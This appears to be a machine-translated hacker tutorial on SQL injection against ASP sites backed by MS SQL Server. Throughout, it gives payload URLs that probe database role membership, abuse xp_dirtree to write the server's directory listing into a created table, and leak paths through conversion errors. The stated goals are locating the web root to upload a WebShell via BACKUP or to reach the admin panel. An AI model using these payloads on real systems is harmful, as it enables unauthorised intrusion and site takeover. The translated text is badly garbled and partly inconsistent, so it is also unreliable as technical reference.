Weird SQL injection [Author: Anonymous Copy from: Site author Hits: 110 articles entry: angel]
SQL injection with unique, novel, mutual statement, has a big breakthrough, of course, it is necessary to make a stake in the two aspects, to achieve a trick, and you will be the core! That is the foundation of SQL injection technology. For a long time, MS SQL has brought great convenience to us with its powerful storage process. Today, the injection technology is mainly based on IIS error and the MS SQL system prompt information, which uses Select to construct a special statement, so that the system is wrong to get What we want more in-depth information, such as explosions, explosions, etc., can you achieve more information? The answer is possible, but there must be a trick! Let's take a step by step to dismantle! First open the MS SQL query analyzer, enter: XP_dirtree Applicable Permissions PUBLIC statement: exec master.dbo.xp_dirtree 'c: /' The information returned by two fields Subdirectory, Depth. The Subdirectory field is a character pattern, the depth field is a plastic field. What did you think? Don't worry, we continue! Statement: CREATE TABLE DIRS (Paths Varchar (100), ID INT) Role: The statement of the table is familiar with it? But the table built here play a key role! That is, the same is the same as the XP_Dirtree associated, the field is equal, and the type is the next operation. Come, the mystery will be announced! Statement: INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'C: /' Role: Do you think strange? Is there any problem in the INSERT statement? NO! The principle is that as long as we build a table definition of the field returned to the store process, it is possible to execute! The difference between the regular insert table (Values) is here, the value we cannot place the storage process, using younger: INSERT DIRTREC MASTER.DBO.XP_DIRTREC MASTER.DBO.XP_DIRTREE 'C: /', the effect of writing tables - Since You can write a table, then we can use unapproved storage processes to step by step to meet the information we want! Do you understand what you have? I don't understand, I don't have the relationship, I've been in actual combat, the practice is better than theory, then we have come to recruit! Really look! The following uses a website as a base point test, pay attention: The following tests are not SA permission! Statement: http://www.xxxxx.com/down/list.asp? Id = 1 'Returns: Microsoft OLE DB Provider for SQL Server Error' 80040E14 'String' 'has not closed quotes.
/down/list.asp, line 21 test permission structure: statement 1: http://www.xxxxx.com/down/list.asp? id = 1 and 1 = (select is_srvrolemember ('sysadmin')); Statement 2: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('serveradmin')); - Statement 3: http://www.xxxxx.com/ Down / List.asp? id = 1 and 1 = (select is_srvrolemember ('setupadmin')); - statement 4: http://www.xxxxx.com/down/list.asp? id = 1 and 1 = Select is_srvrolemember ('securityadmin')); - Statement 5: http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (SELECT IS_SRVROLEMEMBER ('securityadmin'); - statement 6 : Http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('diskdmin')); - Statement 7: http://www.xxxxx.com/down/ List.asp? id = 1 and 1 = (select is_srvrolemember ('bulkadmin')); - statement 8: http://www.xxxxx.com/down/list.asp? id = 1 and 1 = (select is_srvrolemember ('bulkadmin')); - Statement 9: http://www.xxxx.com/down/list.asp? id = 1 and 1 = (select is_member ('db_owner')); - through actual test, Only the DB_OWNER statement returns the information normally, it can be determined that the permissions owned by the connection database are DB_OWNER (Down database owner), skip the explosive explosion form step, before the black anti-defense is very clear, everyone can look down the smelling "cross-library query What do you want to play, now we get the manner's table and management form, further access to two methods: all the fields, the management background The household password is difficult to find the management of the rear stage path, which is an individual activity; the other is to upload WebShell directly through Backup, and the difficulty is looking for a web directory.
Handmade suspension management The successful chance of the rear stage path is very low, to use XP_dirtree to get the information we want, the following method may be simple! The first publication, maybe many friends are using, but it is absolutely very good! Let's write the path to the table! Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; CREATE TABLE DIRS (Paths VARCHAR (100), ID INT) - Return: Normal information! Explain that the construction form is successful! carry on! Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1; INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'C: /' - Return: Normal information. Note All directories written in the C drive are successful! Cool! The next step is to take a table! Violent. Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1 and 0 <> (SELECT TOP 1 PATHS from DIRS) - Back: Microsoft Ole DB Provider for SQL Server Error '80040E07 'The syntax error occurs when converting the varchar value' @inetpub 'to a column of data type INT. By exploding the directory name in the table! Statement: http:// http://www.xxxx.com/down/list.asp? Id = 1 and 0 <> (SELECT TOP 1 PATHS from Dirs where Paths Not in ('@ @Etpub')) - Finally The same method is tested to get the web directory in E: / web, get two options after the web directory, one is to further obtain the website management background, and the other is directly obtained by BACKUP.
